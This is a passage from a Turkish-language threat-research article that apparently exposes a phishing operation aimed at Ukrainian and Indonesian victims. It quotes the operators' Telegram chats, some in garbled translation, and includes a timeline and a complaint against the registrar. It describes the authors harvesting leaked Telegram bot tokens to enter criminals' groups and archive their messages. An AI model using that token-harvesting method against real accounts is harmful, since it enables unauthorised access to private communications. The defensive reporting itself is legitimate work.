Sensiz de yapacak bir şeyler var)
Bu, onun dikkatini gerektiren birden fazla eşzamanlı işlemin olduğunu ima eder

MONETTI'nin Telegram grupları geri kalanını anlatıyor: Medusa Google Ads (black-hat PPC dolandırıcılığı), bir Deepfakes kanalı (dolandırıcılık amaçlı sentetik ortamlar) ve MARLBORO SOHBETİ (özel, bilinmiyor). Telegram Premium aboneliği, 7/24 hizmet saatleri ve "Есть предложение" ("Bir teklifim var") iş hayatına dair özgeçmişi, siber suçu tam zamanlı bir iş olarak gören birinin profilini ortaya koyuyor.

MONETTI ESCOBAR: Tam Mesaj Günlüğü (10 mesaj)
MONETTI ESCOBAR (@monettiescobar) — Mesaj Geçmişinin Tam Çevirisi
-- TraFFeeQ Sohbeti | Trafik Arbitrajı | Kara SEO/Reklamcılık | (9 mesaj) --
ME
MONETTI ESCOBAR2025-12-06 20:42
Boş ver!Bırak şunu!
ME
MONETTI ESCOBAR2025-12-06 20:42
Bir adam işini yapıyorAdam işiyle meşgul
ME
MONETTI ESCOBAR2025-12-06 20:42
Saldırganlık yokHiçbir şekilde saldırganlık yok
ME
MONETTI ESCOBAR2025-12-06 20:40
Bunun için de endişelenmeBunun için de endişelenme
ME
MONETTI ESCOBAR2025-12-06 20:39
Onunla konuş, dostum. Bunu yapması yasak değil.Onunla biraz sohbet et dostum, bunu yapması yasak değildi
ME
MONETTI ESCOBAR2025-12-06 20:39
(Senin dışında yapılacak pek çok şey var!)Senin dışında yapacak başka şeyler de var!)
ME
MONETTI ESCOBAR2025-12-06 20:39
Seninle konuşacak hiçbir şey yokSeninle tartışacak bir şey yok
ME
MONETTI ESCOBAR2025-12-06 20:38
Takma adının yanında yazıyor. Tıklamana gerek yok, kendin göreceksin.Takma adının yanında şöyle yazıyor: “Sen” demene gerek yok, oku şunu
ME
MONETTI ESCOBAR2025-12-06 20:38
Adam işini yapıyor, bunun karşılığında maaş alıyor (konuşmak isterim)İnsan işini yapıyor, bunun karşılığında para alıyor; isterseniz tartışın)
-- Medusa | Google Ads | Sohbet (1 mesaj) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍
MONETTI ESCOBAR’ın Telegram profili
Ekran görüntüsü 2 — MONETTI'nin Telegram profili.
Bonya'nın Telegram profili
Ekran görüntüsü 3 — Bonya'nın profili. DC2'ye (Amsterdam) dikkat edin.

7. Bölüm: Panik Odası

PhishDestroy, güvenlik açığı bulunan Telegram botu aracılığıyla operatör grubuna erişim sağladıktan sonra, aşağıdaki diyalog gerçekleşti. Aşağıdaki sohbet kaydı İngilizceye çevrilmiş olup, orijinal Rusça metin italik olarak korunmuştur. Erişim için kullanılan kimlik bilgileri gizlenmiştir.

Operatör Grubu — "Idr kartı" — Sohbet Günlüğünün Tamamı (61 mesaj)
— REDACTED, açıkta kalan bot jetonu aracılığıyla katıldı —
R
SİRTİLEŞTİRİLMİŞ25-03-2026 13:03:43
/start
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
KimKim
B
Bonya25-03-2026 13:07:14
XzХз
R
SİRTİLEŞTİRİLMİŞ25-03-2026 13:07:14
Merhaba, verilerinizi kaydetmek için lütfen bir dakika bekleyin
ME
MONETTI ESCOBAR25-03-2026 13:07:24
Ne oluyor lan?Ne lan
B
Bonya25-03-2026 13:07:27
SiktirSiktir
B
Bonya25-03-2026 13:07:28
İşte o kişiKim o?
ME
MONETTI ESCOBAR25-03-2026 13:07:42
Hıh.Ahaha
ME
MONETTI ESCOBAR25-03-2026 13:07:44
Ne oluyor lan?Ne lan
B
Bonya25-03-2026 13:07:53
Botun güvenliği ihlal edildiBot kırıldı
B
Bonya25-03-2026 13:08:16
Savunmamızın berbat olduğu söylendi bana.Bu arada bana, bizim savunmamızın resmen berbat olduğunu söylemişlerdi.
B
Bonya25-03-2026 13:08:22
Şey, bir tür varŞey, orada bir adam var işte
B
Bonya25-03-2026 13:08:43
Bu, bir botu bir oltalama saldırısıyla ele geçirmek gibi bir şey.Bizde botu, parmak parmağa vurmak kadar kolay bir şekilde çökertmek mümkün
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[SİLİNMİŞ].[SİLİNMİŞ]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
O kim?Bu kim?
B
Bonya25-03-2026 13:10:29
Profilinizi kontrol edin.Profiline bir göz at
B
Bonya25-03-2026 13:10:32
Bu bir hackerBu bir hacker
B
Bonya25-03-2026 13:10:35
Kelimenin tam anlamıyla.Kelimenin tam anlamıyla
B
Bonya25-03-2026 13:10:41
Onun ilhamla aktardıklarını tercüme ettiKanalında yazdıklarını tercüme ettiler
B
Bonya25-03-2026 13:10:55
[SİLİNMİŞ — Bonya, kendi alan adını bildiren kanaldan gelen mesajı kopyalayıp yapıştırarak, kendilerini bildiren kişinin kimliğini tespit etmeye çalışıyor]
B
Bonya25-03-2026 13:12:19
Şey, hmm.Eh, neyse
B
Bonya25-03-2026 13:12:23
O kim, hiç bilmiyorum lan.Kim olduğunu kim bilir
B
Bonya25-03-2026 13:12:25
Ama kalıcı olarak değilAma bu iyiye işaret değil
B
Bonya25-03-2026 13:12:47
@devosus, canımıza okunmadan önce savunmayı bir düşünelim.@devosus, kıçımızı parçalamadan önce savunmayı bir düşün
Editörün notu: Bonya bunun olacağını hissediyor. Diyelim ki o bir Rus ve Ukrayna’yı dolandırmayı “vatanseverlik” olarak görüyor. Peki ya Endonezya — bir Ekim 2024'ten beri BRICS ortağı (Kazan zirvesi)? Müttefiklerin vatandaşlarından hırsızlık yapmak da vatanseverlik mi sayılır? BDT dolandırıcıları, zekâsı ve sadakati sıfır olan, herkese eşit davranan hırsızlardır. Bu konuyu belgelediğimiz diğer araştırmalarımızı okuyun ceza kovuşturması vakaları benzer operatörler için — sonuç her zaman aynıdır.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
Evet, anlıyorum.Evet, görüyorum
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Siktir git.Ne saçmalıyorsun ya
B
Bonya25-03-2026 13:13:09
Eh, tüm enerjinin tükenmesi de pek heyecan verici bir şey değil tabii.Eh, birbirine yapışık olmak da pek keyifli değil
ME
MONETTI ESCOBAR25-03-2026 13:13:13
O hiçbir şey yapmayacakO hiçbir şey yapmayacak
ME
MONETTI ESCOBAR25-03-2026 13:13:18
Ne yapacak acaba?Ne satacak?
D
Devoys25-03-2026 13:13:26
nedirbu ne
ME
MONETTI ESCOBAR25-03-2026 13:13:34
Evet, bir adam katıldıEvet, o da katıldı
D
Devoys25-03-2026 13:13:34
neredennereden
B
Bonya25-03-2026 13:13:35
Kendi IP adresinizle o sahte siteye birkaç kez giriş yapmış olsanız bile, bu artık hoş bir şey değil.Kendi IP adresimden birkaç kez o siteye girmiş olsam bile artık eğlenceli değil
ME
MONETTI ESCOBAR25-03-2026 13:13:37
GrubaGruba
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzХз
D
Devoys25-03-2026 13:13:39
interpol kullanıldığındaInterpol’e başvurulduğunda
D
Devoys25-03-2026 13:13:41
kihangi
ME
MONETTI ESCOBAR25-03-2026 13:13:44
BuBu
B
Bonya25-03-2026 13:13:46
Sadece sohbet etmek için buraya geldimSohbete buradan gir
B
Bonya25-03-2026 13:13:49
Şöyle yazdı:Şöyle yazmış:
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Bonya25-03-2026 13:13:57
Merhaba, verilerinizi kaydetmek için lütfen bir dakika bekleyin
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Fotoğraf paylaşıldı]
D
Devoys25-03-2026 13:14:31
Onları daha önce görmüştüm.Böylelerini daha önce görmüştüm
B
Bonya25-03-2026 13:14:44
Eh, ukr botunda da yakalandık.Eh, Ukrayna botu yüzünden de başımız belaya girdi
B
Bonya25-03-2026 13:14:55
Sohbet odasında mesaj göndermedin.Son zamanlarda sohbete mesaj yazmadık
B
Bonya25-03-2026 13:14:57
Bunu sen yazmadın mı?Hayır, yazmışlardı
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Umurumda bile değil.Ne de olsa siktir et
B
Bonya25-03-2026 13:15:06
Kanal adınaKanal adına
D
Devoys25-03-2026 13:15:23
Boş ver şunu.boş ver gitsin
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Bu grubu dağıtırımBu grubu siliyorum
B
Bonya25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
evetevet
— Grup, sahibi tarafından silindi —

Grup birkaç dakika içinde silindi. Bonya’nın veda mesajı — “+” — ve Devoys’un “evet” diye onaylaması her şeyi açıklıyor: Açığa çıktıklarını biliyorlardı ve tek çare kanıtları yok etmekti. Ancak o zamana kadar veriler çoktan toplanmıştı.

Bonya’nın açıklayıcı yorumuna dikkat edin: "Ukrayna botunda da saldırıya uğradık" — Her iki projenin de (Ukrayna ve Endonezya) aynı operatör ekibine sahip olduğunu ve altyapılarının ilk kez saldırıya uğramadığını doğruladı.

8. Bölüm: Bunun Gösterdiği Şey

PhishDestroy Nasıl Çalışır?

Şu adreste yer alan her alan adı phishdestroy.io bu otomatik Pipeline'dan geçer. dopomogvoina[.]sbs de bir istisna değildi.

Tespit
Statik Analiz
Altyapı Haritalama
Kökenin Keşfi
OSINT
Rapor Oluşturma

Soruşturma Zaman Çizelgesi

20 Mart 2026
Etki Alanı dopomogvoina[.]sbs NiceNIC International aracılığıyla kayıtlı
21 Mart 2026
PhishDestroy’un otomatik izleme Pipeline tarafından tespit edildi
21 Mart 2026
Tam otomatik analiz tamamlandı: altyapı haritalandı, JS paketi şifresi çözüldü, WebSocket protokolü belgelendi
22 Mart 2026
Origin IP tespit edildi. Aynı sunucuda ikinci bir kimlik avı projesi (“HealthCare ID”) ortaya çıkarıldı
22 Mart 2026
Açığa Çıkan config.json Telegram API aracılığıyla operatörün kimliğinin belirlenmesine yol açar
23 Mart 2026
Barındırma sağlayıcısına, Cloudflare’e ve ilgili CERT’lere yapılan kötüye kullanım bildirimleri
25 Mart 2026
Makale yayınlandı. Etki alanı raporları PhishDestroy'da yayında

Bu Nasıl Mümkün Oldu: PhishDestroy’un Bot İstihbarat Ağı

Bu araştırma tamamen şu kişiler tarafından yürütülmüştür: otomatik sistemler. PhishDestroy’un Pipeline’ı sadece kimlik avı alan adlarını tespit etmekle kalmaz, bunların arkasındaki operatör altyapısına da sızar.

2,000+
Telegram Botları Toplandı
Etkin
Bazı Botlar Hâlâ İzleniyor
2024 yılından beri
Koleksiyon Devam Ediyor

Oltalama kitleri Telegram bot jetonlarını ifşa ettiğinde — tıpkı bu örnekte olduğu gibi config.json — Sistemimiz bunları otomatik olarak toplar, operatör gruplarını eşleştirir, üye listelerini çıkarır ve mesaj geçmişlerini arşivler. 2.000'den fazla bot 2024 yılından beri bu şekilde toplanmaktadır. Bazıları hâlâ faaldir ve suçluların faaliyetlerini gerçek zamanlı olarak izlemekten keyif alıyoruz — çünkü sonu zaten bellidir.

Hesaplarını silen ya da gruplarını temizleyen operatörler bile artık çok geç kalmış oluyor. Onlar paniğe kapıldıklarında, biz çoktan her şeye sahip olmuşuzdur — mesaj arşivleri, profil verileri, grup üyelikleri, bağlı botlar. Silme işlemi hiçbir şeyi değiştirmez. Veriler zaten mevcuttu ve şu anda da veritabanımızda yer almaktadır.

"Beni Bekle" — Dolandırıcı Sürümü

Bu durum tekil bir örnek değildir — bu, şunun bir örneğidir: NiceNIC tarafından sergilenen sistematik ihmal bunu “mega hackerlar”ın bir örneği olarak sunmaya karar verdik. “Типичный Мошенник”in de haklı olarak belirttiği gibi: hackerlar ile dolandırıcılar arasında bir fark vardır — zekâ. Bu kişiler ne hacker ne de zeki.

PhishDestroy’un sistemleri, binlerce etki alanı genelinde bu tür kanıtları otomatik olarak toplar — botları tespit eder, operatörlerin iletişimlerini arşivler, altyapıyı haritalandırır. Bu özel vaka, yayınlanmayacak kadar absürt bir durumdu. Kimlik avı kiti piyasada yaygın olarak bulunan türden, güvenlik önlemleri (OPSEC) ise hiç yok denecek kadar zayıf ve operatörler, keşfedildikten birkaç dakika sonra panik içinde grubunu sildiler.

Şu bilgileri gösterecek bir sistem geliştiriyoruz: alan adı rapor sayfalarında doğrudan doğrulanmış operatör kimlikleri — dolandırıcıdan kurbana, tıpkı Rus televizyon dizisi "Жди Меня" (Beni Bekle) gibi, ama tersine. Dizi, 2024 yılından beri kapalı modda yayınlanıyor. Hesaplarını silenler de dahil olmak üzere birçok operatörün kimliği zaten tespit edildi. Şu anda sadece en ilginç bunu sunmanın bir yolu. Takipte kalın.

İlgili Alan Adları

Yaptığımız analizde ikinci bir alan tespit edildi — hlpforvpeople[.]sbs — aynı kayıt kuruluşu aracılığıyla, birbiriyle uyumlu altyapı yapılarına sahip olarak kaydedilmiştir. Her iki alan adı da veritabanımızda kayıtlıdır:

Kayıt Kuruluşunun Kurallara Uymaması: NiceNIC International

NiceNIC International Group Co., Limited (Hong Kong) şirketi, çok sayıda ayrıntılı istismar ihbarı PhishDestroy'dan her ikisiyle ilgili olarak dopomogvoina[.]sbs ve hlpforvpeople[.]sbs. Yayınlandığı tarihte — İlk bildirimin üzerinden 5 gün sonra — herhangi bir önlem alınmamıştır. Her iki alan adı da hâlâ tam olarak çalışır durumdadır.

Bu, münferit bir durum değildir. NiceNIC, araştırmalarımızda sıkça karşımıza çıkan bir sorundur. Kayıt kuruluşunun kötüye kullanım bildirim adresi (abuse@nicenic.net) kanıtlarla dolu kimlik avı raporlarına sürekli olarak yanıt vermemektedir. ICANN tarafından akredite edilmiş ve Kayıt Kuruluşu Akreditasyon Anlaşması’na (RAA §3.18) tabi olmasına rağmen, NiceNIC görünüşte cezasız bir şekilde faaliyet göstermektedir.

NiceNIC, Rusça dilinde faaliyetlerini sürdürmekte ve satış yapmaktadır .ru yüksek fiyatlara (~200 $) alan adları satıyor ve Rusça konuşan kitleler arasında popüler olan VK ve Telegram platformları aracılığıyla müşterileriyle iletişim kuruyor. Müşterilerinin yeraltı topluluklarıyla örtüşmesi, kayıt kuruluşunun kötüye kullanım bildirimlerine yanıt vermemesinin ihmal mi yoksa kasıtlı bir iş stratejisi mi olduğu konusunda ciddi sorular ortaya atıyor.

Bu araştırma kısmen şu yayında yer almıştır: NiceNIC’in uzun süredir harekete geçmemesi nedeniyle. Kayıt kuruluşları, kimlik avı suistimallerine karşı harekete geçmeyi reddettiklerinde, kamuoyuna ifşa etmek geriye kalan tek hesap verebilirlik mekanizması haline gelir.

Önemli Noktalar

  • Otomasyon, gelişmelere ayak uydurmanın tek yoludur. Kimlik avı kitleri birkaç saat içinde devreye alınır ve saldırı aracı haline getirilir. Manuel inceleme, bu hızı yakalayacak şekilde ölçeklendirilemez.
  • Operatörler hata yapabilir. İkincil bir projede açıkta kalan bir yapılandırma dosyası, çok uluslu bir kimlik avı operasyonunun tamamını ortaya çıkardı. Her projede kusursuz bir operasyonel güvenlik (OPSEC) sağlamak zordur.
  • Sosyal mühendislik, haber döngüsüyle birlikte gelişmektedir. Savaş, insani yardım ve devlet programları, meşruiyetini sorgulama olasılığı daha düşük olan, zor durumda bulunan kişileri hedef aldıkları için, kimlik avı tuzaklarında giderek daha fazla istismar edilmektedir.
  • Altyapının yeniden kullanımı artık bir normdur. Tek bir sunucu, iki kimlik avı projesi, iki ülke, aynı operatörler. Altyapı bağlantılarını haritalandırmak, tek bir alan adını tek başına analiz etmekten çok daha fazla bilgi ortaya çıkarır.

İlgili Araştırmalar

PhishDestroy’un otomatik istihbarat Pipeline’inden gelen diğer araştırmalar

TrustWallet Paneli Ortaya Çıktı
Yönetici paneline yapılan saldırı, operatörlerin sohbet kayıtlarının da yer aldığı, birçok ülkeyi kapsayan bir kripto para dolandırıcılığı operasyonunu ortaya çıkardı.
Kripto Para Çalma Ağları Ortaya Çıktı
DeFi kullanıcılarını hedef alan ve cüzdanlarını boşaltan kimlik avı kitlerinin arkasındaki altyapıyı ortaya çıkarmak.
NiceNIC: Siber Suçlara Zemin Hazırlayan Kayıt Kuruluşu
ICANN tarafından akredite edilmiş bir kayıt kuruluşunun, bu soruşturma da dahil olmak üzere, kötüye kullanım bildirimlerini nasıl sürekli olarak görmezden geldiği.
xmrwallet Ortaya Çıktı: 10 Yıllık Çalınan Anahtarlar
JavaScript analizi ve alan adı adli incelemesi sayesinde ortaya çıkarılan, on yıl süren bir Monero cüzdan dolandırıcılığı.
Dolandırıcılık Altyapısı Ortaya Çıktı
Paylaşımlı barındırma, paylaşımlı operatörler — kimlik avı ağlarının kampanyalar arasında altyapıyı nasıl yeniden kullandıkları.
BuyTRX Drainer Ortaya Çıktı
TRON tabanlı bir enerji dolandırıcılığı, kötü niyetli akıllı sözleşme onayları yoluyla cüzdanları boşaltıyor.

Yasal Uyarı: Bu araştırma tamamen pasif keşif ve halka açık API’ler aracılığıyla yürütülmüştür. Hiçbir sisteme yetkisiz erişim gerçekleştirilmemiştir. Telegram Bot API çağrılarında, operatörler tarafından kimlik doğrulaması gerektirmeyen bir uç noktada halka açık olarak paylaşılan bir token kullanılmıştır. Bu makaledeki tüm alan adları, standart bilgi güvenliği kuralları uyarınca gizlenmiştir.

Bu Araştırmayı Paylaş

X / Twitter Telegram Reddit LinkedIn

İlgili Soruşturmalar

Kripto Kimlik Avının Anatomisi: Tersine Mühendislik Yöntemiyle İncelenen 8 Gerçek Tohum İfadesi Çalma Aracı
KAPSAMLI SORUŞTURMA
Kripto Kimlik Avının Anatomisi: Tersine Mühendislik Yöntemiyle İncelenen 8 Gerçek Tohum İfadesi Çalma Aracı
Dolandırıcılar Ortaya Çıktı: 4 Dolandırıcılık Arka Ucu Ayrıntılı Olarak İncelendi
SORUŞTURMA
Dolandırıcılar Ortaya Çıktı: 4 Dolandırıcılık Arka Ucu Ayrıntılı Olarak İncelendi
$0 Takedowns: How We Disrupt Phishing Infrastructure
SORUŞTURMA
$0 Takedowns: How We Disrupt Phishing Infrastructure